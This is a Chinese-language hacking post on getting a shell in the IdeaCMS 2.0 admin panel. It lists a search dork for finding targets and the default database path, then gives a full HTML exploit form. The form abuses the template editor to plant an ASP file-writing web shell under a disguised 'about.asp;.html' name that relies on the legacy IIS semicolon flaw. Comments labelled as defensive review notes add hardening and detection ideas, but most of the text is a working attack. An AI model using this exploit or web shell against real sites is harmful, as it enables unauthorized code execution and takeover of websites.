IdeaCMS2.0后台拿shell
IdeaCMS2.0后台拿shell
系统:IdeaCMS2.0
关键字: inurl:about/indexlist.asp?SortID=
默认数据库:date/Idea_Site.mdb
后台拿shell方法:
把下面的代码保存为 HTML 文件,并修改其中的 URL。
HTML代码
---------------------------------------------------------
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=gbk" />
<TITLE>模板后台管理-EXP</TITLE>
</head>
<body>
<!--
  Review note (defensive): this page is a stand-alone form that posts to the
  CMS admin template editor (admin/admin_template.asp?action=save). Every value
  the editor receives (name, content, folder, filedir) comes from this form, so
  the name and location of the file that gets written are chosen by the client.
  Server-side hardening to consider: accept only template names from a fixed
  allow-list, reject script extensions and ';' in file names, disable script
  execution in the template directory, and require an anti-CSRF token on admin
  POSTs.
  NOTE(review): the form is saved and submitted from outside the admin panel,
  which suggests the save action performs no origin or token check; confirm
  against the CMS source.
-->
<div class="container" id="cpcontainer">
<table class="tb">
<tr class="thead"><th colspan="2">修改模板</th></tr>
<form action="http://www.heimian.com/admin/admin_template.asp?action=save" method="post" >
<tr>
<td width="15%">文件路径:</td>
<td><input name="name" type="text" size="60" value="about.html" />
</tr>
<!--
  The textarea below is pre-filled with classic ASP script instead of template
  markup. The script reads a target path ("path") and a body ("dama") from the
  request, writes the body to that path with createtextfile, and then prints a
  small form for submitting both values. No authentication check is visible in
  it, so once it is stored under an executable name it acts as an open file
  writer.
  Detection ideas: requests carrying "path" and "dama" parameters to a URL under
  the template directory, and template files that contain server-side script
  tags.
-->
<tr>
<td colspan="2"><textarea name="content" style="width:100%;font-family: Arial, Helvetica, sans-serif;font-size: 14px;" rows="25" dataType="Require" msg="请填写模版内容"><%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="Have fun!"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=OK~>"%></textarea></td>
</tr>
<!--
  Hidden fields: "filedir" is ../template/ideacms/html/about.asp;.html, while
  the visible "name" field shows about.html, so the stored file name differs
  from the one displayed.
  NOTE(review): the ".asp;" in the stored name presumably relies on the legacy
  IIS behaviour of ignoring the part after ';' when selecting the script
  handler; confirm for the affected deployment.
  Detection ideas: files with ';' in their names under the template directory,
  and POSTs to the save action whose filedir does not end in a plain .html name.
-->
<tr>
<td></td><td ><input type="hidden" name="folder" value="../template/ideacms/html"><input name="filedir" type="hidden" value="../template/ideacms/html/about.asp;.html"><input type="submit" name="Submit" value="修改模板" class="btn" /> </td>
</tr>
</form>
</table>
</table>
-----------------------------------------------------------------
提交之后,文件会以表单隐藏字段 filedir 指定的名称保存(文件名中带有“.asp;”,应是利用了旧版 IIS 对分号文件名的解析问题),路径为:
/template/ideacms/html/about.asp;.html